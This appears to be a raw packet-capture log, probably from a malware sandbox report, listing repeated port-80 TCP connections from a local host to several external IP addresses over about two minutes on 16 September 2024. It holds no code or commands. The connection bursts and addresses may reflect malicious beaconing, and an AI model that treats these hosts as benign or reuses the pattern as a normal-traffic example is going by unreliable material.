                                                  Sep 16, 2024 09:38:23.913543940 CEST804971313.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:23.913698912 CEST4971380192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:23.925378084 CEST4971380192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:23.930509090 CEST804971313.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:24.846539974 CEST804971313.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:24.846569061 CEST804971313.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:24.846707106 CEST4971380192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:25.432359934 CEST4971380192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:26.451301098 CEST4971480192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:26.457676888 CEST804971413.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:26.457786083 CEST4971480192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:26.469443083 CEST4971480192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:26.474380016 CEST804971413.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:27.367500067 CEST804971413.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:27.367526054 CEST804971413.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:27.367661953 CEST4971480192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:27.979161024 CEST4971480192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:28.997421026 CEST4971580192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:29.002356052 CEST804971513.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:29.002496004 CEST4971580192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:29.012908936 CEST4971580192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:29.029897928 CEST804971513.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:29.029913902 CEST804971513.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:29.944726944 CEST804971513.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:29.944751978 CEST804971513.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:29.944838047 CEST4971580192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:30.526240110 CEST4971580192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:31.546960115 CEST4971680192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:31.552186012 CEST804971613.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:31.552289009 CEST4971680192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:31.559880018 CEST4971680192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:31.564745903 CEST804971613.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:32.474405050 CEST804971613.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:32.474641085 CEST804971613.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:32.474744081 CEST4971680192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:32.477287054 CEST4971680192.168.2.513.228.81.39
                                                  Sep 16, 2024 09:38:32.482129097 CEST804971613.228.81.39192.168.2.5
                                                  Sep 16, 2024 09:38:37.739150047 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:37.744436979 CEST804971766.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:37.744549036 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:37.754627943 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:37.759586096 CEST804971766.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:39.260384083 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:39.307946920 CEST804971766.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:40.279242039 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:40.284393072 CEST804971866.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:40.284497976 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:40.295301914 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:40.300209045 CEST804971866.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:41.807297945 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:41.855881929 CEST804971866.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:42.827400923 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:42.832251072 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:42.832381010 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:42.844691992 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:42.849505901 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:42.849659920 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:44.354146957 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:44.400095940 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:45.373991013 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:45.379055023 CEST804972066.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:45.379159927 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:45.387876987 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:38:45.392709970 CEST804972066.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:59.132735968 CEST804971766.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:38:59.132806063 CEST4971780192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:01.633238077 CEST804971866.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:39:01.633347988 CEST4971880192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:04.363660097 CEST804971966.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:39:04.363881111 CEST4971980192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:06.757117987 CEST804972066.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:39:06.757237911 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:06.758469105 CEST4972080192.168.2.566.81.203.200
                                                  Sep 16, 2024 09:39:06.766808033 CEST804972066.81.203.200192.168.2.5
                                                  Sep 16, 2024 09:39:12.199665070 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:12.205360889 CEST8049721103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:12.207679987 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:12.218713045 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:12.223608971 CEST8049721103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:13.080423117 CEST8049721103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:13.080441952 CEST8049721103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:13.080519915 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:13.729363918 CEST4972180192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:14.748621941 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:14.753643036 CEST8049722103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:14.753750086 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:14.769258976 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:14.774209023 CEST8049722103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:15.619581938 CEST8049722103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:15.619651079 CEST8049722103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:15.619923115 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:16.276484013 CEST4972280192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:17.295213938 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:17.300097942 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:17.300437927 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:17.311908960 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:17.317514896 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:17.317660093 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:18.180404902 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:18.180795908 CEST8049723103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:18.184784889 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:18.822942972 CEST4972380192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:19.842127085 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:19.847037077 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:19.847454071 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:19.856473923 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:19.861432076 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:20.746443987 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:20.746486902 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:20.746615887 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:20.749727964 CEST4972480192.168.2.5103.42.108.46
                                                  Sep 16, 2024 09:39:20.754569054 CEST8049724103.42.108.46192.168.2.5
                                                  Sep 16, 2024 09:39:25.782504082 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:25.787328959 CEST80497253.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:25.788732052 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:25.803492069 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:25.808265924 CEST80497253.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:26.244250059 CEST80497253.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:26.244471073 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:27.307276011 CEST4972580192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:27.312232018 CEST80497253.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:28.326940060 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:28.331841946 CEST80497263.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:28.332036018 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:28.343379021 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:28.348160982 CEST80497263.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:29.854942083 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:29.860075951 CEST80497263.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:29.860321045 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:30.925614119 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:30.931443930 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:30.931561947 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:30.947163105 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:30.952959061 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:30.953057051 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:31.392275095 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:31.392340899 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:32.463562965 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:32.468478918 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:33.531539917 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:33.536536932 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:33.539658070 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:33.559560061 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:33.564409018 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:36.928082943 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:36.928137064 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:36.928246975 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:36.930953979 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:36.935704947 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:50.185074091 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:50.191167116 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.195285082 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:50.206973076 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:50.212172031 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.728400946 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.728446960 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.728463888 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.728486061 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:50.728513956 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:51.714595079 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:52.732867956 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:52.737734079 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:52.737807035 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:52.752088070 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:52.756974936 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:53.196399927 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:53.196472883 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:53.196489096 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:53.196513891 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:53.196554899 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:54.263051033 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:55.279623032 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:55.284421921 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.284550905 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:55.295613050 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:55.300571918 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.300585985 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.748812914 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.748838902 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.748855114 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.749003887 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:56.807399035 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:57.827155113 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:57.832179070 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:57.832321882 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:57.840626955 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:57.845439911 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290278912 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290292025 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290302992 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290314913 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290493965 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:58.290493965 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:58.295156002 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:58.299990892 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:40:03.476825953 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:03.481820107 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:03.481914043 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:03.496592045 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:03.501640081 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086756945 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086779118 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086791992 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086803913 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086816072 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086828947 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086951971 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086962938 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086973906 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086986065 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.087002039 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.087002039 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.087002039 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.087407112 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.092001915 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092015982 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092027903 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092040062 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092051983 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092144966 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.092144966 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.173852921 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.173954964 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.173969030 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.174010992 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.174063921 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.174247026 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:05.011080980 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:06.032664061 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:06.037602901 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:06.038577080 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:06.052649021 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:06.057580948 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:07.557348967 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:07.608635902 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:08.576570988 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:08.581487894 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:08.581552029 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:08.594481945 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:08.599368095 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:08.599423885 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.104367971 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208085060 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208101988 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208112955 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208118916 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208122969 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208132982 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208137989 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208148003 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208168983 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208178997 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208187103 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208189011 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208203077 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208213091 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208218098 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208218098 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208226919 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208226919 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208252907 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208252907 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208275080 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208297014 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208395004 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208429098 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208445072 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208481073 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208782911 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.209541082 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.209602118 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.216156006 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.216169119 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.123816013 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.128886938 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.128974915 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.140705109 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.145577908 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717657089 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717679024 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717694044 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717708111 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717724085 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717739105 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717753887 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717767000 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717782021 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.717811108 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.718095064 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.718167067 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.720654011 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.722666979 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.722677946 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.722692966 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.722703934 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.722728014 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.722796917 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.804210901 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.804229975 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.804241896 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.804335117 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:11.804486036 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.804486036 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.808115959 CEST4973680192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:11.813087940 CEST8049736162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:24.949824095 CEST4973780192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:24.959258080 CEST804973784.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:24.959326029 CEST4973780192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:24.971071005 CEST4973780192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:24.975797892 CEST804973784.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:25.435020924 CEST804973784.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:25.435087919 CEST4973780192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:26.479262114 CEST4973780192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:26.484210968 CEST804973784.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:27.498574972 CEST4973880192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:27.503473997 CEST804973884.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:27.503885984 CEST4973880192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:27.515270948 CEST4973880192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:27.520478964 CEST804973884.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:27.960931063 CEST804973884.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:27.962763071 CEST4973880192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:29.028937101 CEST4973880192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:29.034439087 CEST804973884.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:30.045017958 CEST4973980192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:30.051208973 CEST804973984.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:30.051348925 CEST4973980192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:30.062365055 CEST4973980192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:30.067523956 CEST804973984.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:30.067542076 CEST804973984.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:30.536211014 CEST804973984.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:30.536273956 CEST4973980192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:31.573590994 CEST4973980192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:31.578677893 CEST804973984.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:32.593368053 CEST4974080192.168.2.584.32.84.32
                                                  Sep 16, 2024 09:40:32.598244905 CEST804974084.32.84.32192.168.2.5
                                                  Sep 16, 2024 09:40:32.598310947 CEST4974080192.168.2.584.32.84.32
